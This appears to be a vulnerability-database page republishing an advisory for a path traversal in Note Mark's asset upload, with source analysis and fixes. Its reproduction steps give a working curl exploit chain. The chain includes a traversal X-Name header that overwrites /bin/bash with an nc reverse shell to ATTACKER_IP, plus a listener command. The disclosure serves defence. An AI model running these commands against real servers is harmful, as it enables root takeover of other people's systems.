Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
6DescriptionGitHub Advisory
Description
The Note Mark application allows authenticated users to upload assets to notes via POST /api/notes/{noteID}/assets, where the asset filename is provided through the X-Name HTTP request header. This value is stored directly in the database without any sanitization or validation - no path separator filtering, no directory traversal sequence rejection, and no use of filepath.Base() to strip directory components. The unsanitized name is persisted as-is in the note_assets table (Name column, varchar(80)).
When an administrator subsequently runs the data export CLI commands (note-mark migrate export-v1 or note-mark migrate export), the stored asset name is passed directly into filepath.Join() and path.Join() calls as part of the output file path argument to os.Create(). Since Go's filepath.Join() resolves ../ sequences during path normalization, an attacker-controlled asset name containing directory traversal sequences causes the export process to write files to arbitrary locations on the filesystem, completely outside the intended export directory.
The export process typically runs as root (the default in Docker deployments and common in bare-metal setups). This means the arbitrary file write operates with root privileges, allowing an attacker to write to any writable location on the filesystem. This can be escalated to Remote Code Execution by overwriting system binaries such as /bin/bash with a malicious payload. Since the Go binary is statically compiled and does not shell out to external programs during the export, overwriting /bin/bash does not affect the running export process. However, the next time any user or administrator invokes bash on the system, the attacker-controlled binary executes instead, resulting in code execution as root. In environments with cron or systemd, writing to /etc/cron.d/ or systemd unit files provides additional exploitation paths.
The data flow is: X-Name HTTP header > handlers/assets.go (no validation) > services/assets.go (stored to DB as-is) > cli/migrate.go (used in os.Create(filepath.Join(..., asset.Name))) > arbitrary file write.
Source Code Analysis
The asset upload handler at backend/handlers/assets.go:48-51 extracts the filename directly from the X-Name header:
type PostNoteAssetInput struct {
NoteID uuid.UUID `path:"noteID" format:"uuid"`
Name string `header:"X-Name" required:"true"`
RawBody []byte `required:"true"`
}The service layer at backend/services/assets.go:39-42 stores this value without validation:
noteAsset := db.NoteAsset{
NoteID: noteID,
Name: name,
}The V1 export function at backend/cli/migrate.go:328 uses the unsanitized name directly:
f, err := os.Create(filepath.Join(noteDir, asset.Name))The non-V1 export function at backend/cli/migrate.go:223 similarly uses it:
f, err := os.Create(path.Join(assetsDir, asset.ID.String()+"."+asset.Name))In both cases, filepath.Join / path.Join resolves ../ sequences in asset.Name, causing the resulting path to escape the intended directory.
Steps to Reproduce
- Start a Note Mark instance (version 0.19.2 or earlier) using the official Docker image:
docker run -d --name notemark -p 8080:8080 -e JWT_SECRET="$(openssl rand -base64 32)" -e PUBLIC_URL="http://localhost:8080" ghcr.io/enchant97/note-mark-aio:0.19.2 - Register a user account:
curl -s -X POST http://localhost:8080/api/users -H 'Content-Type: application/json' -d '{"username":"attacker","password":"Attack3r!","name":"attacker"}' - Authenticate and capture the session cookie:
curl -s -D - -X POST http://localhost:8080/api/auth/token -H 'Content-Type: application/json' -d '{"username":"attacker","password":"Attack3r!","grant_type":"password"}'. Save theAuth-Session-Tokencookie value from theSet-Cookieresponse header. - Create a notebook:
curl -s -X POST http://localhost:8080/api/books -H 'Content-Type: application/json' -b 'Auth-Session-Token=<TOKEN>' -d '{"name":"test","slug":"test"}'. Note the returnedidasBOOK_ID. - Create a note in the notebook:
curl -s -X POST http://localhost:8080/api/books/<BOOK_ID>/notes -H 'Content-Type: application/json' -b 'Auth-Session-Token=<TOKEN>' -d '{"name":"test","slug":"test"}'. Note the returnedidasNOTE_ID. - Upload an asset with a reverse shell payload in the body and a path traversal filename in the
X-Nameheader targeting/bin/bash:curl -s -X POST http://localhost:8080/api/notes/<NOTE_ID>/assets -b 'Auth-Session-Token=<TOKEN>' -H 'X-Name: ../../../../../../bin/bash' -H 'Content-Type: application/octet-stream' -d '#!/bin/sh\nnc <ATTACKER_IP> <PORT> -e /bin/sh'. Confirm the response contains"name":"../../../../../../bin/bash", showing the traversal payload was stored without sanitization. - Trigger the export as an administrator (simulating the admin running a routine data export):
docker exec notemark /note-mark migrate export-v1 --export-dir /data/backup - Verify
/bin/bashwas overwritten with the attacker payload:docker exec notemark cat /bin/bash. The file should contain the reverse shell script instead of the original bash binary, confirming arbitrary file write. - Start a listener on the attacker machine (
nc -lvnp <PORT>), then invoke bash on the target:docker exec notemark bash. A reverse shell connects back to the attacker as root, confirming Remote Code Execution.
Proof of Concept (Video)
note-mark-path-traversal-rce.webm
Recommendations
The root cause is the complete absence of input validation on the X-Name header value used as the asset filename. The fix should be applied at two layers.
At the input layer in the asset upload handler, the application should reject any asset name containing path separators (/, \) or directory traversal sequences (..). The simplest approach is to apply filepath.Base() to the incoming name, which strips all directory components and returns only the final filename element. Names that resolve to empty strings or . after this operation should be rejected. This validation should be applied in the PostNoteAsset handler before the name reaches the service layer.
At the export layer in the CLI migration code, the application should apply filepath.Base() to asset.Name before using it in any file path construction as a defense-in-depth measure. This ensures that even if a malicious name exists in the database (from before the input validation was added), the export process cannot be exploited. Both the V1 export path at migrate.go:328 and the standard export path at migrate.go:223 require this fix.
Reported By: Ravindu Wickramasinghe (rvz) - Zyenra Security - www.zyenra.com
AnalysisAI
Path traversal in Note Mark's asset upload feature allows authenticated users to inject directory traversal sequences into asset filenames via the X-Name HTTP header, which are stored unsanitized in the database. When an administrator subsequently runs data export CLI commands (typically as root in Docker deployments), the malicious filenames cause arbitrary file writes anywhere on the filesystem through Go's filepath.Join() path normalization. Attackers can achieve remote code execution as root by overwriting system binaries like /bin/bash or injecting cron jobs. Publicly available exploit code exists with video proof-of-concept demonstrating full RCE chain. Vendor-released patch available in version 0.19.4. CVSS 8.6 reflects network attack vector with low complexity but requires authenticated access and administrator interaction to trigger the export process.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-20 – Improper Input Validation
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-30370
GHSA-g49p-4qxj-88v3